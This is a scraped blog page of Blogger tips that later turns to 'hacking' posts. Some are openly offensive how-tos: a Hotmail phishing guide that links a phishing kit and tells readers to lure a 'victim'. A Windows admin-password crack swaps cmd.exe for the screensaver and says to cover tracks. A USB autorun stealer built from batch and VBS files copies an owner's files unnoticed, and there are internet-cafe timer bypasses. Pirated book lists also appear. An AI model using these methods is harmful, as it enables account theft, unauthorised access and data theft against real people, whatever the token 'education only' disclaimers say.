How to make dual language blog with one click

Some time ago I wanted to have two languages on my blog - one for my natives, one international. WordPress have a solution called WPML but it's paid solution. Second thing, I have blogger running so long I don't want to transfer.

I've found simple solution!



This method changes main/home/base adress/domain and leads to same URL on other adress/domain. It's also simple installed, just one HTML/JS widget :)


What you should do before:

1. Create two blogs in two different languages.
2. Go to Settings->Search options and make a link to your own site in "page not found code" just in case :) it can look like:
There is nothing in this link, please continue on <a href="http://maridadiagrncy.blogspot.com">maridadiagency.blogspot.com</a>.

Put your adress instead of mine ;)

---

Now in both of them 
in Layout, create a widget "HTML/Javascript" and paste this code:

<script language="javascript" type="text/javascript"> 

document.write ("<a href=" + window.location.protocol + "//" + "theotherlanguageadress.com" + window.location.pathname + ">the other language name</a>"); 
</script>


Put adress of the second-language-blog in 
theotherlanguageadress.com and name of language used in another blog in the other language name. 

---
Writing new post:

1. go to blog of first language, click New Post
2. put some title
3. put the text, images etc
4. put labels etc.

5. copy
all info from points 2,3,4 to New Post in other language
6. publish posts

7. now you can edit post, change titles to the proper ones in both languages, change text in second language post etc

8. don't translate labels!!!

Procedure for new pages is exactly same :)


---

What you need to know:

You must have all links exact same in both languages . That's why you have to publish posts and pages with exact titles (you can edit later, but URL of post will be created at first time). Also that's the reason to have all labels exact same for all languages.

What works?
Changing language while reading post, when looking for label, on archive pages.

What is not working?
Every URL containing question mark (?) doesn't work. For example links to comments are not working; also changing language while looking for older posts is not -> search works by '?' sign so URLs are being shortened to everything before "?" sign. It's not so important, because most visitors will change language at first; also they probably won't be interested in comments in other language.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to change maximum number of posts in Blogger label page

Blogger has set a default maximum 20 blog posts in its label page (category page). This may or may not suit your preference or your purpose in setting up the label page. You may want to decrease it to increase download time. Alternatively, you may want to increase the maximum number of posts to show all posts with the same label (category).

If you want to change this default maximum number of post, you will have to edit the template. First, backup your blog template (Dashboard > Template > Backup (at the top right corner) > Download full template > All files)


Now you got to open the template editor (Dashboard > Template > Edit HTML). Tick [ ] Expand Widget Templates


Now use ctrl+F to help you find the following codes:


expr:href='data:label.url'

Replace the above with the following (I used the number 150 because I want all posts to be displayed in the label page. You may use other numbers in place of 150):
expr:href='data:label.url + "?max-results=150"'

Repeat this for all instances of expr:href='data:label.url' that you can find. I think for the Simple template, there will be 3 instances, so the above will have to be repeated 3 times.

When done, save template and exit.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to Make your Blogger Blog ready for Mobile Phones

As you know, millions of people use their mobile phones to access internet. The mobile internet speed is also very fast these days with 3G's , mobile apps,etc.

From this, we can say many of your readers are coming to your blog through mobile phones..But, if you don't make your blog mobile friendly, .you may lose all your mobile readers because in a mobile phone, a normal blog takes lot of time to load and there are other issues that your site not fitting properly in the mobile screen.

So, here is how to make your Blogger (blogspot) blog mobile internet friendly..

Sign into your Blogger account > Design > Edit html

Find this line..


<b:include data='blog' name='all-head-content'/>


Paste this code below that line...



<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>

<b:if cond='data:blog.isMobile'>

<meta content='width=device-width, initial-scale=1.0, user-scalable=0' name='viewport'/>

<b:else/>

<meta content='width=1100' name='viewport'/>

</b:if>


Save the Changes!

That's it! Now, your visitors can access your blogger blog through mobile phones with blazing speed...

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to add Blogger Share Buttons to Custom Blogger Templates

Recently, Blogger released their new Share Buttons feature which makes it easier for your Blog visitors to bookmark, tweet, fshare, email ,etc your post.

But, if you're using any custom blogger template.. you may not see the widget appearing in blog..even though you activate it.

So, if you have that problem. here is how to fix it.
(before making any changes..first backup your template)

1. Sign into Blogger > Design > Edit html
(tick the expand widget templates)

2. Add this line anywhere you want the widget to appear

<b:include data='post' name='shareButtons'/>



Normally, in most templates, you can add it after this line..

<p class='post-footer-line post-footer-line-1'>



If you don't find that above line in your template....
Find this one.

<p><data:post.body/></p>


and add this code after that line..


<p><data:post.body/></p>
<div style='clear:both; padding: 10px 10px 10px 10px;'> <b:include data='post' name='shareButtons'/> </div>



Note: If you're using Magazine style blogger template, You can find the data:post.body line TWO TIMES.. So, try in both ways and find out which one is working..and remove the other one.

Finally..Save the template!

If you still don't see it in your Blog, Make sure..you activated it by going to
Blogger dashboard > Design > Click the 'edit' button of the Blog post section.



  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

About Error 503 “Service Unavailable”

Are you getting this error message on your blog dashboard, or while you are trying to access your blog?

Read on to find out what this problem is all about and how to help blogger to solve it.



What does 503 mean?
503 “Service Unavailable” is a “response code” like 404 “Page not found”. The 503 response code is a bit more complicated as it is not a page that is missing it is a server problem. Usually this happens when a server cannot cope or deliver its hosted content to web users, in other words blogger servers have been overloaded.

Background

Back in March Google engineers introduced Auto Pagination which basically reduces and summarizes the amount of posts that a blog displays on the home page, this only affects blogs that show all or most of their full posts on the home page.
This approach to the problem by Blogger has proved ineffective, and Blogger are now having problems in the delivery of certain blogs worldwide.

Who is affected by this 503 “Service Unavailable”

This problem affects all blogs worldwide. One of the ways to find out if you have been affected is to login in Google analytics and check your traffic sources, select search engines and select the keyword that brings most of the traffic to your blog, compare the data with previous months. A notable change in your bounce rate or average time will be a good indicator that your blog had been affected by this 503 response code. The logic behind this is simple, a user trying to view your blog has opened the 503 page and assumed the site down and gone to another site. Due to this you will receive a 100% Bounce rate for that keyword as well as a low time average.

Understanding the problem and its consequences


The consequences of this problem are that you can start to lose traffic and your ranking in search engines. You need to understand that this is not a problem of resources, this cannot be fixed by getting a new server for blogger (if it was I would not be here talking about it).
This is a problem of how we blog and what we do with our blogs.

How to solve the 503 “Server unavailable” on Blogger

Here are a few steps you could take in order to help Blogger to solve the issue.

Basic level (no skills required)
- Summarize your posts.
- Show only the most relevant post on your home page.

If you show full posts on your home page you have a greater chance of encountering the “503” problem, as your blog is using more resources from Blogger to deliver or load your blog. Secondly an excessive number of posts on the home page (even summarized posts) may result in a 503 as there is a delay with Blogger loading your blog. You can opt to show your latest post or more relevant posts, and include a widget with some links to your previous posts. This is SEO friendly and will reduce the amount of problems you will have with your blog.

Medium Level (some skills and knowledge are required)
- Use a light weight template and avoid using the “template designer” from Blogger
- Use Light images

If you are using a template made from the “template designer” tab, there is a simple test that you can do to reveal how efficient your template is: Clean the cookies of your browser and open your blog (not blogger dashboard) by typing the url in the address bar of the browser. Take note of the time that it takes for your blog to load completely, now go to blogger and change your template for any free template and repeat the same steps, clean your cookies and open your blog again and compare the time. Some of the templates made with the “Template Designer” have a poorer performance, especially those that have some java scripts and/or have a background image.

Images play an important part in saving some bites, you can use PNG format or GIF as these are lightweight formats, you can also use JPG but you must always compare them to find out which is the lightest one. PNG is not always the best. If you don’t know how to change the file formats of the images you can search on Google for GIPM; an open source software with features like Paint Shop Pro; easy to use especially to change image formats.

High level (Skills and Knowledge are required)
- Speed test using Firebug for Firefox

The best way to analyze and get a full report on the performance of your blog is by using “Firebug” for Firefox. Firebug will report a series of problems that your blog may have in order to reduce the loading time of your blog which is one of the determining factors of the 503 “Service Unavailable” error.
You will get specific reports on how your CSS is performing, where you can reduce the size of your CSS, where to put your Javascript files, and much more. Most importantly it will create a compressed version of your CSS (best performance) for you to use as well as a copy of all images in a different format, for instance if you have some JPG images, Firebug will compare the same image to other formats and will give to you the same image but under a different format saving you time in editing those images.

Overall there are alot of things that you will find out about your blog after running a test on Firebug that you may not know how to solve, if that is the case you can jump into the forum and ask questions about it.

Why should you bother with all of this?


You may be thinking why do I need to bother with all of this, why not just wait for somebody from Blogger and Google to solve the problem?. Well the answer to that is easy: this is not just Blogger’s problem this is a blog problem, and in this case, blogs worldwide. This is not solved by buying an extra server or hiring somebody to solve the problem, this can in part be solved by us bloggers and the way we do things. Blogger is the only blog platform that offers you the best of both worlds: the benefits of a self hosted blog for free. You just have to ask yourself would I like if Blogger changed the rules and started to charge it’s users for their free service?

This may or may not happen, but for now this is just an appeal to all bloggers to change the way they do things for the best, at the end of the day it will help your blog as well as the user experience that you offer to your blog users.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Hack Unlimited Time In Internet Cafe's.

Do you ever think about having free internet time in any Computer Cafe.?
Maridadi Agency will give you solution of it.
How To Hack Unlimited Time In Internet Cafe's?

Just follow  easiest steps bellow.

Steps:
1. Create a new text document.


2. Then type CMD in it.


3. And then save it as softek.bat
NOTE: (Make sure the file does not end wit .txt, but with .bat)


4. Go to the location were you saved the .bat file and run it. If you've done this correctly, the Command Prompt should open.


5. Now that Command Prompt is open, in it type the following: cd\windows (This will change the directory to Windows)


6. Then type in: regedit
(This will get you to the registry editor guide)


7. Now navigate to:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current version>internet settings>policies>system


8. Then on the right panel where it says Disable Task manager, right click on it, and scroll down to modify, and than change the value of it to "0".


9. And then open Windows Task Manager
(CTRL+ALT+DELETE) (CTRL+SHIFT+ESCAPE !win 7)


10. Now disable the Internet Cafe's timer.


REMEMBER
This is only for Education purpose,DO NOT MISUSE IT.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to create a Password Protected Folder

Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.
 
How to create a Password Protected Folder?


Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.
Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.
Step-3: Now Right-click on this folder (ABC) and select the option Send To ->Compressed (zipped) Folder.
Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.
Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.
Step-6: Now goto the File menu and select the option Add a password.
ie: File -> Add a password
Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible?

Step-1: Now Right-click on this password protected folder and select Properties.
Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).
Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

    Do not show hidden files and folders
    Show hidden files and folders


Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to Crack Windows Administrator password

Why feel so helplessness when lost or forgot windows administrator password? How to Crack Windows Administrator password is a hot topic that spreads among the common computer users. If you’re looking for cracking Windows password as you have forgotten the windows password, read the reset of this article and find out how you can bypass Windows Admin password.

Options 1: Crack Windows XP administrator password

If you log into a limited account on you target computer, then follow the steps below to crack Windows XP administrator password.

    Open you command prompt.
    Type the command below:
        net user password

        cd\
        cd\ windows\system32
        mkdir hacktemp>
        copy logon.scr hacktemp\logon.scr
        copy cmd.exe hacktemp\cmd.exe
        del logon.scr
        rename cmd.exe logon.scr

        exit

    Now basically you have told the windows to backup the command program and the screen saver file, then edited the settings so when the windows loads the screen saver, you will get an unprotected dos prompt without logging into XP.
    Once this happens, enter this command:

If the admin account is called Michelle and you want to reset the password as pass, then enter this:

    net user Michelle pass

Now your administrator account password of Michelle is pass, just using the hacked Windows XP administrator password to reboot your machine and do whatever you want to do.

PS: Don’t forget to copy the contents of hacktemp back into the C:\windows\system32 directory to cover your tracks

Option 2: Hack Windows administrator password form Safe Mode

    Reboot your computer and go to Safe Mode by pressing F8 button before the Windows boot screen appears.

Note: If you are using Windows NT/9X,press F5 instead.

    Select Safe Mode on the screen and then press Enter.
    Your computer will start in Safe Mode.
    Find the icon for Administrator account. If you didn’t change the default settings of your system, the administrator account should no password protected.
    Login as admin, press YES at the prompt asking if you would like to continue using Safe Mode.
    Continue go to start and then click on the control panel. Here you can change any of user account passwords.
    Reboot your computer and then login with the new hacked windows administrator password.

Options 3:  Hack or Crack Windows Administrator Password using Windows Password Cracker software

You need prepare a few things:

        A good computer
        A reliable cable or DSL connection
        A blank CD/DVD or USB flash drive
        A Windows Password Cracker software

After you’ve download the setup file of the software, you will need to Create a password reset CD/DVD or USB flash drive that will enable you to get past your current Windows password. To create this disk you need to:

1. Install the utility on the computer that you’re just using.

2. Take the CD/DVD or USB drive and insert it on an open port on your computer.

3. Run the utility and select the option to burn the utility to the CD/DVD or USB drive.

If you have change the build-in administrator password and now forgot it, you will be unable to hack forgotten windows password by option 1 and option 2. Then option 3 is your best choice to bypass the locked out computer, it is the most effective windows password hacking method on the market. Don’t take my word for it, why don’t you have a look for this utility and try to crack windows administrator password by yourself, Visit: Software to crack Windows Administrator password.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hacking Hotmail and Window Live

Hotmail is also a very famous email service. It is widely used in US and European countries. Today i am going to write how to hack hotmail id. We will use phishing for hacking. The complete process with phoshing script is given below.

FOLLOW THESE STEPS:
1: download the hotmail phishing page below. This phishing page uses php for storing password in text files
http://www.ziddu.com/download/14263748/msn.rar.html


2: Host this script to any free webhost that support php. Get the list of some free host fromhere


3: Now check your script on your host. this page is just like hotmail login page.


4: send this page to victim via mail or any other service and force him to sign in from this page. Use any kind of social engineering for this.


5: check stored password in yourdomain/detail.txt page


NOTE
This Post is only for Education Purpose,do not misuse it.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Change Your Computer Ip.

How to change your IP address in less than a minute?
 The following trick gives you a step-by-step procedure to change your IP address.
1. Click on “Start” in the bottom left hand corner of screen.
2. Click on “Run”.
3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”.
5. Type “exit” and leave the prompt.
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.
8. Right click on “Local Area Connection” and click “properties”.
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.
10. Click on “Use the following IP address” under the “General” tab.
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here.
14. Hit the “Ok” button again. You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings.
17. This time, select “Obtain an IP address automatically”.
18. Hit “Ok”.
19. Hit “Ok” again.
20. You now have a new IP address.
Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack. In this case you need to switch off the modem and then switch it on to get the new IP address.


 All these tricks works only if you have a dynamic IP address. But if you have a static IP address you have no option to change your IP.

NOTE
This Post is only for Education purpose,Do not mis use it.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Administrator Password Hacking

 Many people ask themselves,how they can hack administrator password so that they can simply enter to others computer.Today  I am willing to  share a new  Administrator password hacking system that can help you to solve that program softly .


Please walk with me.

Administrator password can be broken by replacing sam file in system32\config by the sam file in repair folder of windows. it can be easily done on a machine with dual operating systems, simply log on to os other then the one whoes password is to be cracked the way is exactly same as written above but if there is a single os on a machine then there is only one way i.e to use ms dos start up disk or some other boot disk and replace the sam file in config folder with the one in repair folder
 

You should know that his method works only if hard drive is FAT32 formatted because NTFS drive does’nt take boot from Ms DOSThis way you can remove the old administratOr password as if the windows is newly installed and the password was’nt set.

NOTE

This post is only for education purpose,if you misuse it consider our Privacy and Term of Use.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Steal Data From Other Computer


Copy Or Steal Data from other computers by using USB or Pendrive.
This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

Just follow these simple Steps :

1. Open Notepad.

Copy and Paste the following Code into Notepad :
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this file as autorun.inf

2. Open New Notepad again.

Copy and Paste the following Code :
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls


Save this file as File.bat

3. Open Notepad again.

Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False


Save this file as Invisible.vbs
4. Now again open Notepad.
Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

Save this as Launch.bat.
Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.

Create a folder named “Data” where the Stolen contents would be Copied automatically.
Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.


NOTE
THIS IS ONLY FOR EDUCATION PURPOSE.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Collection Of Best Hacking Books Vol 2

                 If you are curious about learning hacking and want to have some good books, this collection will surely help you. First of all, i want to say few words about Indian readers. Never run after self claimed hackers who always fail to show proof of what they have done. In India, hacking workshop is now a big business. Persons who come as trainer show themselves as big hackers but only few of them have real knowledge. I also know few trainers who arrange this kind of workshops and have great command over what they teaching. But most of the Indian self claimed hackers are fake. They publish hacking books by copying other writers content without giving them credits. There are many big names who have done like this. I am just warning to all of you that hacking books written by those writers are only copy paste material and do not have clear idea about what they are writing.


If you want to read some original and real material to know what is hacking, these are some best hacking books. You can also download these books by some tools which allow users to download books from Google Books.


Collection of best hacking books


Hacking For Dummies
By Kevin Beaver, Stuart McClure


Dummies series always have nice books with unique content. This books also covers some basic part of hacking for beginner students. Apart from hacking, this book also covers about internet safety and protection from hackers.


Hacking the Human: Social Engineering Techniques and Security Countermeasures
By Ian Mann


This book covers one of the most powerful attack, social engineering. Social engineering is really a powerful attack and exploit human nature. This book covers sources of risk from social engineering and basis human vulnerabilities.



Ceh Certified Ethical Hacker Study Guide

By Kimberly Graves


This book covers basic about ethical hacking. It is one of the best guides on CEH preparation.



Ethical Hacking and Countermeasures: Linux, Macintosh and Mobile Systems

By Ec-Council


This book is also a nice guide for CEH preparation by EC-Council. EC-Council is one of the best guide that covers topics in offensive network security, ethical hacking, and network defense and countermeasures.



Hands-On Ethical Hacking and Network Defense
By Michael T. Simpson, Kent Backman, James Corley


This book covers penetration testing methodologies in details. This covers all the latest methods of security and penetration testing. Hands-On Ethical Hacking and Network Defense, Second Edition provides a structured knowledge base to prepare readers to be security professionals who understand how to protect a network by using the skills and tools of an ethical hacker.



Hacking: The Art of Exploitation

By Jon Erickson


This is a nice book on hacking written by Jon Erickson who explains how arcane hacking techniques actually work. 



NOTE
THOSE BOOK ABOVE CAN BE FREE DOWNLOADED FROM VARIOUS SOURCE SUCH AS GOOGLE SEARCH.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Collection Of Hacking Books Vol 1

Here i am going to post a large collection of hacking books. There are more than 150 books in this collection on almost every field of computer and network hacking. The name of books are given below with download link at the bottom of the post.

this collection includes:

(Ebook - Computer) Hacking The Windows Registry.pdf
(eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf
(eBook pdf) Hacking into computer systems - a beginners guide.pdf
(ebook_-_pdf)_Hacking_IIS_Servers.pdf
0321108957.Addison-Wesley Professional.Honeypots- Tracking Hackers.pdf
0764578014.Wiley.The Database Hacker's Handbook- Defending Database Servers.chm
076459611X.John Wiley &amp_ Sons.Hacking GMail (ExtremeTech).pdf
1246523-Hacking.Guide.V3.1.pdf
1931769508.A-List Publishing.Hacker Linux Uncovered.chm
2212948-Hacker'S.Delight.chm
285063-Hacker.Bibel.pdf
3077366-HackerHighSchool.pdf
731986-Hacker's Desk Reference.pdf
A Beginners Guide To Hacking Computer Systems.pdf
Addison Wesley - Hackers Delight 2002.pdf
addison wesley - web hacking - attacks and defense.chm
Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb.chm
amazon-hacks.chm
Anti-Hacker ToolKit - McGraw Hill 2E 2004.chm
Attacking the DNS Protocol.pdf
Auerbach.Practical.Hacking.Techniques.and.Countermeasures.Nov.2006.pdf
Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Behind.Breaking.into.and.Defending.Networks.Nov.20.pdf
bsd-hacks.pdf
ceh-official-certified-ethical-hacker-review-guide-exam-312-50.9780782144376.27422.pdf
Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
Computer - Hackers Secrets - e-book.pdf
cracking-sql-passwords.pdf
Crc Press - The Hacker'S Handbook.pdf
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.pdf
DangerousGoogle-SearchingForSecrets.pdf
database hacker handbook.chm
Dummies - Hack How To Create Keygens (1).pdf
ebay-hacks-100-industrial-strength-tips-and-tools.pdf
ebook.oreilly.-.windows.xp.hacks.sharereactor.chm
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
ethical hacking, student guide.pdf
excel-hacks.chm
For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU.pdf
For.Dummies.Hacking.Wireless.Networks.For.Dummies.Sep.2005.eBook-DDU.pdf
google-hacks.pdf
Hack IT Security Through Penetration Testing.pdf
Hack Proofing - Your Network - Internet Tradecraft.pdf
Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress -  ISBN 1-928994-34-2.pdf
Hack Proofing Sun Solaris 8.pdf
Hack Proofing Your E-Commerce Site.pdf
Hack Proofing Your Identity In The Information Age.pdf
Hack Proofing Your Network Second Edition.pdf
Hack Proofing Your Network_First Edition.pdf
Hack Proofing Your Web Applications.pdf
Hacker Disassembling Uncovered.chm
hacker ethic.pdf
Hacker Linux Uncovered.chm
Hacker Web Exploitation Uncovered.chm
Hacker'S.Delight.chm
hacker-disassembling-uncovered.9781931769228.20035.chm
Hackers Beware.pdf
Hackers Secrets Revealed.pdf
Hackers Secrets.pdf
Hackers, Heroes Of The Computer Revolution.pdf
Hackers_Secrets.pdf
Hacker_s_Guide.pdf
Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
Hacking - The Art of Exploitation.chm
Hacking Cisco Routers.pdf
Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
Hacking For Dummies 1.pdf
Hacking For Dummies 2.pdf
Hacking For Dummies.pdf
Hacking GMail.pdf
Hacking IIS Servers.pdf
Hacking into computer systems - a beginners guide.pdf
Hacking the Code - ASP.NET Web Application Security Cookbook (2004) .chm
hacking the windows registry .pdf
Hacking Windows XP.pdf
Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
Hacking-Hacker's Guide.pdf
Hacking-Hackers Secrets Revealed.pdf
Hacking-Hugo Cornwall-The Hacker's Handbook .pdf
Hacking-The Hacker Crackdown.pdf
Hacking.For.Dummies.Access.To.Other.People's.System.Made.Simple.pdf
Hacking.Guide.V3.1.pdf
Hackproofing Oracle Application Server.pdf
hacks.sfv
Hack_Attacks_Revealed_A_Complete_Reference_With_Custom_Security_Hacking_Toolkit.chm
Hack_IT_Security_Through_Penetration_Testing.chm
Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm
How to Crack CD Protections.pdf
John Wiley & Sons - Hacking For Dummies.pdf
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook.pdf
John.Wiley.and.Sons.The.Art.of.Intrusion.The.Real.Stories.Behind.the.Exploits.of.Hackers.Intruders.

and.Deceivers.Feb.2005.ISBN0764569597.pdf
Jon.Erickson.Hacking.The.Art.Of.Exploitation.No.Starch.Press.2003.chm
linux-server-hacks.pdf
Linux-Server.Hacks-OReilly.pdf
little_black_book_oc_computer_viruses.pdf
mac-os-hacks.chm
McGraw Hill - Web Applications (Hacking Exposed).pdf
McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
McGraw.Hacking.Exposed.Cisco.Networks.chm
McGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU.pdf
McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eB.pdf
McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eBook-DDU.pdf
McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-.pdf
McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf
McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eB.pdf
McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eBook-DDU.pdf
Mind Hacks - Tips & Tricks for Using Your Brain.chm
network-security-hacks.chm
No.Starch.Press.Hacking.The.Art.Of.Exploitation.chm
O'Reilly - Online Investing Hacks.chm
O'Reilly.-.Network.Security.Hacks.chm
O'Reilly.Windows.Server.Hack.chm
O'Reilly.Windows.Server.Hack.rar
online-investing-hacks.chm
OReilly  Google Hacks, 1st Edition2003.pdf
OReilly - Flickr Hacks Tips and Tools for Sharing Photos Online (Feb 2006).chm
OReilly - Google Hacks.pdf
Oreilly Access Hacks Apr 2005.chm
Oreilly, Paypal Hacks (2004) Ddu.chm
OReilly,.Digital.Video.Hacks.(2005).DDU.LotB.chm
OReilly,.IRC.Hacks.(2004).DDU.chm
oreilly,.visual.studio.hacks.(2005).ddu.lotb.chm
Oreilly.Amazon.Hacks.eBook.LiB.chm
oreilly.firefox.hacks.ebook-lib.chm
OReilly.Google.Hacks.2nd.Edition.Dec.2004.ISBN0596008570.chm
OReilly.Google.Maps.Hacks.Jan.2006.chm
Oreilly.Linux.Desktop.Hacks.Mar.2005.eBook-LiB.chm
OReilly.Linux.Server.Hacks.Volume.Two.Dec.2005.chm
OReilly.Network.Security.Hacks.chm
OReilly.PayPal.Hacks.Sep.2004.eBook-DDU.chm
OReilly.PC.Hacks.Oct.2004.eBook-DDU.chm
OReilly.Perl.Hacks.Tips.and.Tools.for.Programming.Debugging.and.Surviving.May.2006.chm
OReilly.Skype.Hacks.Tips.and.Tools.for.Cheap.Fun.Innovative.Phone.Service.Dec.2005.chm
OReilly.SQL.Hacks.Nov.2006.chm
OReilly.Statistics.Hacks.May.2006.chm
OReilly.Ubuntu.Hacks.Tips.and.Tools.for.Exploring.Using.and.Tuning.Linux.Jun.2006.chm
OReilly.VoIP.Hacks.Tips.and.Tools.for.Internet.Telephony.Dec.2005.chm
oreilly.windows.xp.hacks.2nd.edition.feb.2005.lib.chm
OReilly.Word.Hacks.Oct.2004.eBook-DDU.chm
OSB.Ethical.Hacking.and.Countermeasures.EC.Council.Exam.312.50.Student.Courseware.eBook-LiB.chm
O_Reilly_-_Windows_XP_Hacks.chm
PC Games - How to Crack CD Protection.pdf
prentice hall - pipkin - halting the hacker- a practical guide to computer security, 2nd edition.chm
Que - UNIX Hints Hacks.chm
Que.Certified.Ethical.Hacker.Exam.Prep.Apr.2006.chm
Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
SoTayHacker1.0.chm
spidering-hacks.chm
SQL Hacks.chm
SQLInjectionWhitePaper.pdf
Syngress - Hack Proofing Linux (2001).pdf
Syngress - Hack Proofing Your Identity in the Information Age - 2002.pdf
Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
Syngress -- Hack Proofing Your Wireless Network.pdf
Syngress Hack Proofing Your Identity in the Information Age.pdf
Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
Syngress.Hack.the.Stack.Oct.2006.pdf
Syngress.Hacking.a.Terror.Network.Nov.2004.ISBN1928994989.pdf
The Little Black Book Of Computer Virus.pdf
the-database-hackers-handbook-defending-database-servers.9780764578014.25524.chm
The_20Little_20Black_20Book_20of_20Computer_20Viruses.pdf
tivo-hacks.100-industrial-strength-tips-and-tools.pdf
u23_Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
Websters.New.World.Websters.New.World.Hacker.Dictionary.Sep.2006.pdf
Wiley.Hacking.Firefox.More.Than.150.Hacks.Mods.and.Customizations.Jul.2005.eBook-DDU.pdf
Wiley.Hacking.Google.Maps.and.Google.Earth.Jul.2006.pdf
Wiley.Hacking.GPS.Mar.2005.ISBN0764598805.pdf
Wiley.Lifehacker.Dec.2006.pdf
Wiley.The.Database.Hackers.Handbook.Defending.Database.Servers.chm
Win XP Hacks oreilly 2003.chm
Windows Server Hacks.chm
WinXP SP1 Hack.pdf
Xbox-hack - AIM-2002-008.pdf
Yahoo.Hacks.Oct.2005.chm
Hackers Beware Defending Your Network From The Wiley Hacker.pdf

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Insecure Cryptographic Storage on web Application

Every organization use digital data storage and use web application to manage and update the data. As the increasing use of internet it is important to digitize everything to make easier to manage and access. To protect sensitive data, web application uses various cryptographic algorithms. This is the key part of web application because security and privacy is the main thing which an organization wants from an application. But sometimes, these applications fail to protect sensitive data while storing. This may be due to store sensitive data in plain text or poor use of cryptographic algorithms.
These flaws can lead to information disclosure of sensitive data and information which may harm organization. If this vulnerability exists in e-commerce website, it may harm users of the website more than the company running the website.
Most common problems why web applications fail to protect data
  1. Storing sensitive and secret data (such as passwords, credit card details) in plain text form.
  2. Use of Home Grown algorithms to encrypt the data. Home Grown algorithms are those which are generated by developers to encrypt the passwords and other important data. This may contain many security holes.
  3. Using older and weak cryptographic algorithms which are easy to crack. MD5 and SHA1 are the example of those weak algorithms.
  4. Insecure use of strong and secure cryptographic algorithms.
  5. Storage of confidential information in memory is incorrect. This can lead to information disclosure.
